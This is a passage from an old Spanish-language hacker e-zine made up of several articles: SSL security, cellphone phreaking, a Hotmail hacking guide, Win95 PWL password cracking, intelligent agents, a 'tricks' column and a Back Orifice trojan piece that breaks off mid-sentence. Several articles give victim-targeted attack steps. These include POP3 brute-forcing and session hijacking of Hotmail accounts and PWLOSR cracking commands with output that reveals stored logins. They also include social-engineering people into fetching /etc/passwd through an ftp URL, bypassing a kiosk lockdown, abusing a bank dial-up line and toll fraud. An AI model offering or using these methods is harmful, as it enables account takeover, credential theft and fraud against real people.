servidores  seguros; ademas  de  disponer  de medidas adicionales de seguridad
tales como cortafuegos. 
       
        En el momento  del Pago, el usuario  introduce los datos de su tarjeta
y  su  Numero  de  Identificacion Personal, que solo el conoce, la transaccion
viaja encriptada por la red y el pago se lleva  a  cabo  en  modalidad On-line
contra el saldo disponible en la cuenta.


        3.6 SSL

        Cuando  encargamos  algo  desde un formulario desde nuestro navegador,
que  cualquiera  puede hacer con unos conocimientos de HTML, hacemos una invi-
tacion a que cualquiera pueda acceder a nuestros datos ya que esta informacion
viaja por la red hasta  que llega al destino, para evitar, que esa informacion
no sea presa de sniffers, ni  amigos  de los ajeno :o)  �Te encuentras tu ahi?
Se utilizan servidores seguros SSL.

      El SSL es un conjunto de protocolos creados por Netscape que proporciona
sesiones  de  comunicacion  encriptadas,  autentificacion del servidor, de los
mensajes,  y  opcionalmente  de  los  clientes.  Esta compuesto por dos capas:
SSL Record Protocol, encargado de encapsular protocolos de bajo nivel y la SSH
Handshake Protocol que permite autentificarse  y  negociar  los  algoritmos de
encriptacion. SSL es independiente de los protocolos y capacita al programador
para realizar un desarrollo tranparente por encima de la capa TCP/IP.

        Los  servidores  seguros  SSL  los podremos notar porque en al esquina
inferior  izquierda  cambia a una llave cerrada en el caso de netscape.  En la
url, cambia de Http:// a Https:// (Hipertext  Transport  Protocol Secure).  EL
gobierno americano permite un cifrado de 128 bits. 

        Aunque claro "La seguridad es solo un estado mental".  Tambien  el SSL
tiene  problemas  de  seguridad,  el  26  de  junio  de  este a�o Murray Hill,
informatico  de  Lucent  Technologres  hizo publica la manera de acceder a esa
informacion y obtener el numero de tarjeta y  datos criticos de la transacion.

        El  ataque  es  posible  pero  poco  probable. La vulnerabilidad no se
produce  sobre  el  SSL,  sino  sobre PKCS, (Public Key Cryptografhy Standard)
encargado del intercambio de llaves en SSL.

       El ataque consiste en mandar mensajes cuidadosamente construidos contra
el servidor seguro que produzcan sendos  mensajes de error de vuelta, a partir
de cuya informacion se puede sacar la llave critica para seguridad.

        Se necesitan en torno a un millon de mensajes hecho que debe llamar la
atencion del administrador del sistema.
               	

        3.7 DESPEDIDA

        Bueno  espero que te haya gustado esta primera parte sobre las posibi-
lades  del  comercio  electronico,  y  la  forma  de  aprovecharse,  lo dicho,
cualquier duda o pregunta la puedes dirigir a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 , aqui tienes
mi llave pgp.

       Pues ya estan la pareja de articulos todos juntos, si quieres ver otros
articulos  de  interes  puedes visitar mi web http://membres.xoom.com/pata666.

        To be continued, please insert coin!!!!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Telefonos celulares (Phreacking) - Azumlord ]������������������������������

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NO TIENES UN CELULAR, QUE ONDA!?, OSEA NO!!!  I -=( Azumlord )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

�[ D i s c l a i m e r  ]������������������������������������������������������

   La   informacion  aqui  presentada,  tiene  fines  solamente  educativos,
cualquier  uso indebido de la informacion aqui contenida  es responsabilidad
de usted!  ( Demonios,  eso  lo dijeron  en un comercial???), el autor no se
hace  responsable  de  los da�os materiales o psicologicos que sean producto
de un mal uso de lo aqui expuesto.

�[ J u s t i f i c a c i o n ]�������������������������������������������������

   Bueno aqui estamos de nuevo, trayendo para ustedes algo de phreacking, en
esta  primera  parte,  de  una  serie  de  partes(o por lo menos eso espero),
hablare sobre las bases de los celulares y de como aprovecharnos de ellos };->

   Es algo corto, pero profundo.... han de disculparme pero esque estoy en
epoca de examenes y no he tenido mucho tiempo libre....

�[ L a s  B a s e s ]���������������������������������������������������������

   Cuando  hablamos  de  telefonia  celular,  nos  referimos a un sistema de
comunicacion  de  alta tecnologia que facilita la transmision y recepcion de
mensajes   sin   necesidad   de  cables  y en  lugar de estos utiliza  ondas  
electromagneticas que viajan atravez del aire.

   El microfono del celular transforma la voz en un impulso electrico, y asi
la  voz  puede  viajar como  una  onda. Estas ondas golpean una pelicula del
microfono  la  cual esta conectada por medio de unos minusculos cables hacia
un iman.
  
   Al  tener una corriente constante y ser movida por la pelicula delgada se
producen  variaciones  en  la  corriente  que son interpretadas como "la voz
electrica".

   Esta  "voz electrica"  viaja del telefono celular al "Switch" o Centro de
Telefonia Celular de una manera inalambrica. Esto  es  posible  gracias a la
tecnica de frecuencia modulada en donde la "voz electrica" se conecta con lo
que  se  denomina  "Sitio Celular" o "Estacion Base", que  junto  con  otros
sitios  conforman  las  unidades de cobertura que por su forma hexagonal son
llamadas "Celulas".

   Una  vez  que  la  voz es capturada por la "celula", es "demodulada" para
obtener nuevamente  una "voz electrica" y es mandada al "Switch", el cual se
encarga  de  mandar  la  voz  ya sea a otro telefono celular o a un telefono
convencional.

   Ahora una forma mas practica de entender esto seria:

   Cuando marcas un numero a  traves de tu celular, la se�al es recibida por
el "Switch" o Central de Telefon�a Celular desde alguna Estacion Base.

   El "Switch" verifica que el numero  de  tu  celular  este autorizado para
hacer llamadas, si no est� autorizado, el "switch" env�a un mensaje y da por
terminado el proceso.

   Si  esta  autorizado, el "switch" analiza el numero al que estas llamando
y decide si este pertenece a otro usuario de algun celular, o a un numero de
la Red de Telefon�a P�blica Conmutada.

  Existen dos tipos de sistemas telefonicos, los analogicos y los digitales:

 ->El sistema Analogico o AMPS(Advanced Mobile Phone System)

   Hace  referencia  a la onda radial por la cual se transmite, es una se�al
fragil,  transmitida  a  baja potencia. La llamada es convertida en impulsos
electricos que viajan  en forma de ondas de radio "Analogas" al sonido de la
voz original.

   Estas  ondas se distorsionan facilmente por factores naturales (lluvias),
o  por obstaculos (arboles, estructuras, lineas electronicas), que ocasionan
perdida de la calidad y llamadas perdidas.

   Ademas este tipo de redes no puede ser ampliadas.

 ->El sistema Digital o DAMPS(Digital Advanced Mobile Phone System)

   Toma las se�ales analogas (sonidos), y las traduce a codigos binarios que
pueden ser transmitidos a alta velocidad, para despues ser  reconvertidos en
el sonido de la voz original. La llamada se transmite de forma similar a los
datos  de  computador,  lo  que  permite que las transmisiones  sean de alta
capacidad, velocidad y resistencia a los inconvenientes usuales.

   Este sistema de redes permite subdividirse con el objeto de ampliarse.

�[ D e s p e d i d a ]�����������������������������������������������������������

 Bueno pues por el momento eso es todo, se que es corto, pero esto solo son
las bases del  sistema celular, en el proximo numero entraremos de fondo en
la clonada de celulares.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Guia para Hackear Hotmail - \Wend|g0 ]�������������������������������������

by SnEzE V.2.0 
980123 2.44 PM
Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >> 

Existen  muchas maneras  de hackear hotmail, pero solamente voy a escribir las
mejores.  Si   estan   no   funcionan,   por   favor,  mandame   un   email  a

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   y mirare  si  has  hecho algo  mal o  si hotmail  a
cambiado algo.
Recuerda que esta informacion es solamente para propositos educacionales y que
nadie puede reprocharme el da�o que puedas haber causado. Tambien recuerda que
si alguien descubre  que has estado paseando en su cuenta, se puede volver muy
desagradable.
Ok, vamos a ello... 
Estas son las formas que mas me gustan.

____ 
I_1_I - Brute force hacking
a. Usa el telnet para conectar al puerto 110 (servidor de Hotmail). 
b. Escribe USER y el nombre de usuario de la victima. 
c. Escribe PASS y entonces adivina el password. 
d. Repetir hasta que se encuentre el password.
!. Esto se  denomina brute force  hacking y requiere  paciencia. Es mejor  que
   intentar adivinarlos en la pagina principal de hotmail ya que es mas rapido

____ 
I_2_I - La mejor forma
a. Pilla el username de la victima ( normalmente se halla en el adress-field )
b. Entonces escribe " www.hotmail.com/cgi-bin/start/victimsusername " 
c. Estas dentro!
!. Este  hack solamente  funciona si  tu estas  en la  misma red  de trabajo o
   computadora de la victima y si el no ha desconectado del servidor (log out)

____ 
I_3_I - La manera "vieja"
a. Ves  a la  pagina principal  de Hotmail  y pilla  una cuenta (si todavia no
   tienes ninguna)
b. Log Out 
c. Ahora escribe el username de la victima. 
d. Mira el source code. 
e. En la 5 fila deberias encontrar "action=someadress" 
d. Copia esta direccion y pasteala dentro de adress-field 
e. Estas dentro!
!. Como puedes ver esto es un procedimiento muy largo y la victima tiene 
   tiempo de sobra para desconectar (log out).

____ 
I_4_I - Otra...
a. Ves a la pagina principal de Hotmail 
b. Copia el source code. 
c. Haz un nuevo archivo html con el mismo codigo pero cambia method=post y pon
   method=enter
d. Haz un "view" de la pagina 
e. Cambia la direccion a www.hotmail.com/ (No apretes enter !!!) 
f. Haz que la victima escriba su username y password 
g. Mira en el adress-field. Alli podras ver ...&password:something...
!. Esto es lo que yo uso, ya que te deja conocer el password. ( Si el sale del
   browser tu puedes ver el password en el History folder!
   He echo un ejemplo de este truko que puedes usar en:
   hem1.passagen.se/christog/index.htm. Buena suerte!

LEELO!
Los administradores  de Hotmail  han cambiado  el sistema,  asi que la victima
puede desconectar (log out)  incluso si tu  estas dentro de su cuenta. De modo
que no pierdas el tiempo!
Este texto viene de http://hem1.passagen.se/christog/hotmail.htm 
Recuerda que es la version V.2.0.. Pronto habra mas...
Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Crackear PWL's - CHack ]���������������������������������������������������

Como decodificar archivos PWL de Win95 (Solo para Newbies). Por CHack ...

Una de tantas ma�anas en las que leia la lista de Raregazz encontre un mensaje
que hablaba  de la "seguridad"  en Windows 95 y  de que se podia entrar en las
maquinas usando algunos programas que decodifican los password de los usuarios
que se encuentran en los archivos *.PWL

Realmente no  entendi mucho del tema pero el gusanillo de la curiosidad empezo
a crecer;  pero, �relamente  que era  eso de  los PWL?, �donde  estaban?, �que
pitos tocaban?

Lo primero  fue encontrar  esos programas  en Internet,  asi que  buscando  en
varias  paginas aparecieron  el GLIDE  y PWLOSR,  relamente  no  supe como  se
manejaba el GLIDE pero vi que el PWLOSR no era tan dificil de manejar.

La segunda  estapa fue localizar  donde estaban esos  archivos PWL en mi disco
duro y despues de eso tratar de destriparlo.

El archivo PWL lo encontre en el subdirectorio:

C:\WINDOWS

El archivo tenia el nombre

juan.pwl

"casualmente" las letras de mi nombre de usuario juan.

este  archivo lo  copie al  subdirectorio donde  tenia el  PWLOSR y me propuse
tratar  de que el  programa "adivinara" el  pass, cosa no  muy dificil por que
eran solo  tres letras 'AAA'  para  ello en  una  ventana de  DOS  utilice  el
siguiente comando:

PWLOSR.EXE /BRUTEFORCE [PwlFileName] [UserName]

bueno realmente lo que escribi

PWLOSR.EXE /BRUTEFORCE juan.pwl juan

Con ello el programa desplego lo siguiente:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
                                ~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning brute session for file 'JUAN.PWL',
of user 'JUAN' with EnuStr:
<<0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ��������������������������������>>.
Using password lenght 0 characters.
Using password lenght 1 characters.
Using password lenght 2 characters.
Using password lenght 3 characters.
Password 'AAA' - maybe correct!

Efectivamente el programa habia descubierto que mi pass era AAA

Una vez  localizado el  pass me tuve que salir de la ventana de DOS y cerrarla
desde W95, porque el programa continua buscando.

Volvi a abrir la venta de DOS y le di la instruccion

PWLOSR.EXE /LIST[:E] [PwlFileName] [UserName] [UserPwd]

PWLOSR.EXE /LIST:E juan.pwl juan AAA

Desplegando lo siguiente:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
                                ~~~~~~~~~~~~~~~~~~~~~~~~~       
File: 'JUAN.PWL' has size 2B0h bytes
for user 'JUAN' with password 'AAA' contains:

-[Technical Information]---------------------------------------
 Password file version: 968582E3;   Offset to Header: 00000252
 Unknown Align: 0000; UnkCount: 00000001;  CheckSeed: 00000001
 CryptoSeed Array = ( 00000000, 00000000, 00000000, 00000000
-[Resources pointers]------------------------------------------
00  00  00  00  00  00  00  00 - 00  00  00  00  00  00  00  00
-[Resources key indexes]---------------------------------------
00  FF  FF  FF  FF  FF  FF  FF - FF  FF  FF  FF  FF  FF  FF  FF
---------------------------------------------------------------
 CryptoSign =  6C 3A 41 C3 F0 B1 0F A5 FB BD A8 A2 D8 E4 A1 C7
 CheckoSign =  1F B4 4D E1 13 12 F0 CF 9D E3 AC 08 5B 44 58 57
---------------------------------------------------------------
 Data = ( 0290, 0292, 0294, 0296, 0298, 029A, 029C, 029E, 02A0
 Len. = ( 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000
-[Dump]--------------------------------------------------------
  0290: 02 83 8B F8 - 1E B1 8D 99 - EA F0 7A 97 - 33 9F 85 D5
  02A0: AB F4 E9 92 - BF AE 5E E8 - 8F AC 90 E3 - A6 ED 14 C5
-[Character]---------------------------------------------------
---------------------------------------------------------------

-[Type]-[The resource location string]--------------[Password]-
  Link   PLOPEZ\C                                       pedro
  -??-   222.18.36.18/222.18.36.18             bxbxbxbx:tmibmr
  Dial   *Rna\Data Internet\jmendez                   n33wr66&
  Link   MARYSOL\C                                       mary
  Link   MEMO ROSAS\C                                 memorin
---------------------------------------------------------------
  Key Entrys: 5;   Number of resources: 5.

O sorpresa,  el PWLOSR  no solo desplegaba  mi pass,  sino tambien los login y
password de las  maquinas a las  que me habia conectado dentro de mi intranet,
asi como mis conexiones de internet.

Para este  momento ya la curiosidad  por entrar a mas maquinas me corroia, asi
que  con este  metodo empece  a  entrar  a otras  que  me  dieron  mas  y  mas
informacion; solo me enfrente a tres problemas:

1.-     El programa PWLOSR solo sirve para archivos PWL de W95.

2.-     El nombre del archivo PWL no siempre coincidia con el nombre
        del  usuario, situacion que  corregi observando  el  archivo
        C:\Windows\System.ini que en una parte que dice:

        [Password Lists]
        JOSEANTONIOPEREZ=C:\JOSEANTO.PWL

3.-     Los pass que utiliza la gente no son tan faciles como el mio
        que solo  tenia tres letras, y la fuerza bruta tardaba mucho
        en encontrar  pass de  mas de  4 letras, por lo que tuve que
        utilizar un diccionario  de apoyo que lo llame DICT.VOC y lo
        aplique utilizando para ello el siguiente comando.

        PWLOSR.EXE /VOCABULARY [PwlFileName] [UserName] [VocFile]

        Bueno lo que de verdad escribi fue

        PWLOSR.EXE /VOCABULARY JOSEANTO.PWL JOSEANTONIOPEREZ DICT.VOC

        obteniendo el siguient resultado:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
                                ~~~~~~~~~~~~~~~~~~~~~~~~~       
Beginning vocabulary session for file 'JOSEANTO.PWL',
of user 'JOSEANTONIOPEREZ' via vocabulary 'DICT.VOC'.
Password 'FRANK' - maybe correct!
Password 'FRANK' - maybe correct!

Totally trained 193762 passwords, Vocabulary position 2207350.
Elapsed time 55 seconds; Average speed 3522 passwords per second.
Cracked passwords 2. Check them under MD95 Logon.

Se que  para muchos  el decodificar password  es quiza  su modo de vida, y que
este articulo puede ser  solo un grano de arena en el desierto, pero realmente
espero que  sirva para aquellos  que empiezan en  el oficio  con mas ganas que
conocimiento, y quiza estas  cosa por ser tan faciles nadie se toma el tiempo
para explicarlas.

Gracias  a Hard  Wisdom autor  de PWLOSR,  Gracias a  la lista  que  con  cada
respuesta incrementa mis pregunatas.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Agentes Inteligentes - 12r ]�����������������������������������������������

    ---------------------------------------------------------------------
    ---------------------Agentes Inteligentes----------------------------
    ---------------------by 12r43l Overdrive-----------------------------
    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 -----------------------------
    ---------------------------------------------------------------------

El  objetivo de  este  articulo es  explicar  rapidamente que  son los agentes
inteligentes a si como sus pricipales aplicaciones.

Imagina  un dia,  que  lleges a tu PC y tus pendientes, ya esten clasificados,
que  las noticias  que te interesan ya estan en tu escritorio, que las ofertas
que  tanto buscabas  estan esperando tu compra. Todo esto sera posible gracias
al "push-technology"  el cual  se basara en tus preferencias para filtrar todo
tipo de  informacion que  no sea  relevante para  ti y la que te intereza sera
llevada  a tu escritorio;  lista para  que tu  decidas que hacer con ella o en
algunos casos ya este procesada.

Este  tipo  de tecnologia  se  basa en  piezas  de software  llamadas "Agentes
Inteligentes",  los  cuales   realizan   toda   la   labor   de  recopilacion,
clasificacion, filtrado o  procesado  de informacion an su ambiente de trabajo
el cual puede ser desde una PC "standalone" hasta Internet.

Como parte  de los  sistemas de  informacion de siguiente generacion existiran
objetos  semi-autonomos   de   software   que  realizaran  tareas  especificas
previamente establecidas.

Todavia  no existe una  definicion universal de  agentes inteligentes pero una
definicion muy  general podria ser la siguiente:

"Una entidad de software autonoma que ejecuta tareal delegadas por el usuario"

Los  agentes inteligentes  pueden interactuar  con el usuario, con sistemas de
informacion  y  con  otros agentes.  Pueden ser  complejos o simples, trabajar
solos o en grupos creando una sociedad cooperativa. Pueden viajar de un nodo a
otro atravez de la red reportando  sus  actividades.

La  mayoria de  los agentes,  estan basados en la idea de que  el usuario solo
tiene  que especificar  algunas preferencias como por ejemplo 'que', 'cuando',
'donde'  para que ellos puedan tomar deciciones basados en sus instrucciones.

Existen  algunas  caracteristicas  que  puede   tener  un   software  que  sea
considerado un agente.

1.- Delegacion  de actividades.  Puede establecer  algunos  trabajos  a  otros
    agentes para lograr su trabajo final.

2.- Habilidad de comunicacion. Tiene que tener la habilidad de interactuar con
    el usuario asi como con otros agentes o medios.

3.- Monotireo.  El agente  debe de  monitorear su  entorno para poder realizar
    actividades autonomamente.

4.- Actuacion. Debe de poder afectar su ambiente de trabajo.

5.- Inteligencia.  El agente  debe de  poder interpretar  los eventos  que  le
    incumban  para  poder  tener  una  actuacion  apropiada  asi   como  tomar
    deciciones.

6.- Continuacion. Necesita permanecer activo, corriendo procesos y actulizando
    su estado.

7.- Caracter. Algunos agentes pueden tener un estado emocional.

8.- Adaptabilidad.   Deben   optimizarse   automaticamente   basados   en  las
    preferencias de usuario aprendidas previamente.

9.- Mobilidad. Deben  de tener la capacidad de transportarse a traves de redes
    y distintas plataformas y arquitecturas de informacion.

Entre  las  pricipales  aplicaciones  de  los Agentes Inteligentes tenemos las
siguientes:

Correo  electronico, Sistemas  de  soporte de  decision,  Interfaz de usuario,
Teleconferencia,    Telecomunicaciones,     Sistemas     de   calendarizacion,
Entretenimiento, Web, Sistemas FAQ, Archivos de USENET, Editores graficos.
  
Recusos :

LALO (http://www.crim.ca/sbc/english/lalo)
Agent Building Enviroment (http://raleigh.ibm.com/iag/iagsoft.htm)
W-Prolog (http://munkora.cs.mu.oz.au/~winikoff/wp/)
Tabriz Agent Ware (http://www.genmagic.com/Tabriz/)
Phantom (http://apocalypse.org/pub/u/antony/phantom/phantom.html)
Agent builder (http://www.cs.umbc.edu/news/raise.shtml)
Java Intelligent Agent Library
(http://www.bitpix.com/business/main/ialib/ialib.html)
Tcl Plug-ins (http://www.sun.com/960710/feature1/plugin.html)
Aglets Library (http://www.ibm.co.jp/trl/projects/aglets/)
Jess (http://herzberg.ca.sandia.gov/jess/)
Penguin (http://coriolan.amicus.com/penguin.html)
HORB (http://wwww.mysticgrp.com/java/horb/welcome.html)
Autonomus Agent Programming using Java (http://riz.siac.com/AIT/agentref.html)
Java-To-Go- Interactive Computing Using Java.
(http://ptolemy.eecs.berkeley.edu/~wli/group/java2go/java-to-go.html)
Cyberagent SDK (http://www.ftp.com/cyberagents/)
Oracle Web Agent
(http://www.oracle.com/products/websystems/webserver/html/ois3.html)
Phyton (http://www.phyton.org)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Varios trucos interesantes - SatMex ]��������������������������������������

1) Como joder los banners del anonymizer.com

Estas cansado de los banners? Yo si y mucho pero te voy a decir como quitarlos
sin pagar un centavo solo tienes que cambiar el puerto:

http://invis.user.anonymizer.com/www.hostremoto.com.gob.mx.etc.etc

Activalo en tu browser como proxy (donde dice puerto no escribas nada) y listo
tienes  proxy. La  diferencia del  anonymizer y otros ademas de que cobran por
usarlo es que te permite entrar a cualquier direccion no importa que no acepte
proxy (por lo menos en el hotmail me funciona).

Si  por alguna  razon  es cancelado  te voy a decir como puedes saver la nueva
direccion  o el proxy; esto lo descubri escaneando los puertos del anonymizer.
Es facil, solo con el un port scanner escanea www.anonymizer.com y los puertos
que  esten abiertos  trata  de ver  su  los puedes  usar  de proxy. Hay muchos
puertos abiertos y la mayoria funcionan.


2) Como poder explorar las computadorasde telmex que estan de demostracion con
   internet directo.

La  otra vez que fui a pagar el telefono a telmex y descubri que habian puesto
computadoras  de muestra  con  internet para  los  clientes :) lo  malo es que
estaban  protegida con  algun  programa que  no te deja usar explorer, ms-dos,
promt,  desabilitadas  muchas  opciones (la  verdad casi todas, run, shutdown,
restar,  restar msdos,  etc,  le busque  y  le busque  pero  con  que  estaban
deshablilitadas  muchas opciones pero usando el internet explorer (browser) en
donde  esta el  link  puedes poner  c:\windows  y puedes ver la informacion  y
ejecutarla.. (en el caso de mi pueblo asi estan deshabilitadas las opciones no
se sin en otro lugar estan activadas)


3) Banco Bital

La  otra vez  lei  en un  emag  de raregazz pasado un numero carrier del banco
bital. El  numero era 91-800-50140 pues lo probe como una conexion ordinaria a
internet y cuando te pide el  username: password y le das cualquier username y
password  y marca que  es incorrecto el login lo intentas de nuevo y en cuanto
des  enter despues  de que  escribas  la password  precionas  la tecla F7 y te
conecta  a internet  a  una velocidad de 9600bps (te lo garantizo pero primero
tienes  que precionar  breaks para que te aparezca el login). Pero no te creas
que  ya tienes  conexion a internet. lo  bueno es que te asigna ip adress pero
unicamente   solo  puedes  utilizar el  ICQ y puedes escanear puertos, finger,
whois,  ping, trace.  Tambien  si se  conectan 2 o mas personas con este mismo
numero  pueden compartir  informacion  por la  razon  que  estan  en  el mismo
servidor y pudes poner tu ftp server y que el otro usuario pueda entrar.
Pero  no puedes entrar a ningun chat no puedes usar telnet ni conectarte a una
pagina web al menos que sea la pagina de www.bital.com.mx)

Usa condon pa que no te cachen.....

Proximamente  tendre el numero de telefono (carrier) para que te conectes free
a internet por medio de este servidor con estas claves.....


4) Hackeando desde el ICQ

En  estos dias  el icq  es el programa mas popular en el internet; si no sabes
que  es icq, es un programita que viene siendo un beeper y un celular mientras
ese programita este activado estaras en linea con tus amigos. Pero no te voy a
explicar  muy bien  mejor  vete a  www.mirabilis.com. Ahora que el icq esta de
moda  supongamos que  nececitas una  password de un servidor Ftp o alguien que
quieras  que te  haga el favor de bajarte el /etc/shadow pues de la manera mas
facil  te vas  a "add  find users".  Alli esta  la  opcion "icq  main  engine"
escojela y donde dice email pones *@host.com.gob.mx.etc.etc y te saldran todos
los  usuarios de  ese  servidor y  alli tu podras ver su info (all algunos muy
l4m3rz que hasta ponen su telefono y su direccion  y su nombre completo email,
etc;)   esto  resulta mejor que el finger ;) de alli es una forma de tratar de
acesar usando  los apellidos  o nombres de la persona pero otra forma que a mi
me  a resultado es contactando a esa persona y haciendome su amiga entonces le
hago  preguntas tu  provedor acepta ftp? tu provedor te da tu password o tu la
eliges? Si  no sabe  que es  ftp solo  dale el ftp pero en el browser dile que
ponga esto porque se de muchos ignorantes que no saben ni madre:
ftp://username:password@la_direccion_de_su_server.com/etc/passwd
y dile que te pase el texto que salio  ;)
O tambien puedes usar mas ingenieria social solo es cuestion de pensar.....
(te  recomiendo que  registres otra cuenta y te pongas nombre de mujer joven y
atractiva para obtener mejores resultados y para que no te cachen.....)


5) Hacer Preacking desde cualquier lugar del mundo llamando a Usa *free*

Te  has fijado  que los  telefonos publicos de USA (Estados Unidos Americanos)
puedes llamar  a los  telefonos publicos?. Haz una  llamada  por  cobrar a  un
telefono publico y cuando contesten de el otro lado ese telefono sonara (claro
que  el publico)  la operadora dire "acepta los cargos y ustedes contestan si.
Si no lo has hecho hazlo  =)
Recuerda  que tienes  que  buscar  un  telefono  publico  que permita  recibir
llamadas; de esos hay muchos en USA, no se si en otro lado habra; a mi siempre
me funciona cuando hablo con mis hermanos....

Email Me:

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


|���(r) SatMex (r)�ϯ|


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ IRC - ToMaCHeLi/ZeD ]������������������������������������������������������

              MANERAS DE COLARSE (y prevenirse) EN UN HD ATRAVES DEL IRC   �
                                    POR
                ToMaCHeLi--(http://members.tripod.com/~tomacheli)

                                     Y

                ZeD------(http://www.angelfire.com/ak/HACKZED/ZED2.html)

             MIEMBROS DEL HaCk`S-wEb-RiNg--(http://come.to/HaCkS-wEb-RiNg)


������������Ŀ
�INTRODUCCION�
��������������

Debido  al creciente  aumento de  maneras que  existen de entrar y/o controlar
computadoras  ejenas a traves  del irc,  nos hemos  decidido a  escribir  este
articulo para raregazz.
En el trataremos de explicar las formas que hay para introducirse, controlar..
un ordenador de forma remota a traves del irc.

Si quieres comentarnos algo, aqui tienes nuestros mails:

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
      
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  

����������������������Ŀ
�FIN DE LA INTRODUCCION�
������������������������


                BACK ORIFICE.
--------------------------------------

El  Back Orifice  lo  creo  no  hace  demasiado tiempo  un  grupo  de  hackers
americanos con el fin de poder entrar en cualquier ordenador sabiendo tan solo
la IP del usuario.
Si te mandan un .EXE     NO LO EJECUTES A MENOS QUE ESTES COMPLETAMENTE SEGURO
DE LO QUE ES.

Muchas  personas estan  propagando por  inet el  programa SERVER  de  diversas
maneras  (lo mas extendido  es por el IRC). Y aqui entra en papel el ignorante
internauta  que  se  dedica a ejecutarlo  en  su  maquina  creyendo que es  un
autoextractor   de  fotos X   :). Una  vez  ejecutado  SORPRESA!,  el  archivo
desaparece �?�?�?  otia  �?�?�?,  y  la  pobre victima  piensa, (bah, me habra
llegado defectuoso el archivo), y no le da importancia.
Si,  pues chaval  FELICIDADES acabas  de meter  un  troyano en  tu sistema :),
cualquiera  que sepa  tu IP podra hacer en tu PCera casi lo que le de la gana.
Tas cubierto de gloria :)) (mas bien de mierda que OTROS te han tirao encima).

El troyano en cuestion funciona de la siguiente manera:
cuando ejecutas el .EXE este instala un programa que se llama (espacio).exe
y borra el ejecutable que te han pasado.
Cada vez que reinicies tu windo2 (solo funciona en este sistema) el troyano se
auntoinstalara y se cargara en memoria (osea que olvidate de borrar el archivo
(espacio).exe,por que no funcionara).

El troyano deja abierto un puerto en tu sistema LIBRE DE CUALQUIER PROTECCION.
este  es un  puerto llamado "31173" (sin comillas)(31173=elite) A traves de un
programa  que debe tener  la persona que quiere acceder a tu computadora, este
accedera directamente a tu c:\ a traves  de unos comandos muy simples,pudiendo
hacer lo que le de la gana dentro de tu ordenador,subir y bajar archivos,abrir
mas puertos,ajecutar programas,incluso formatear el disco duro.
Si notas que  te esta pasando  alguna de estas cosas lo que puedes hacer es lo
siguiente:
desconectate de internet y procede a borrar el troyano de la siguiente manera:

Pa que lo pilles rapido,  el archivo se mueve del directorio donde esta y va a
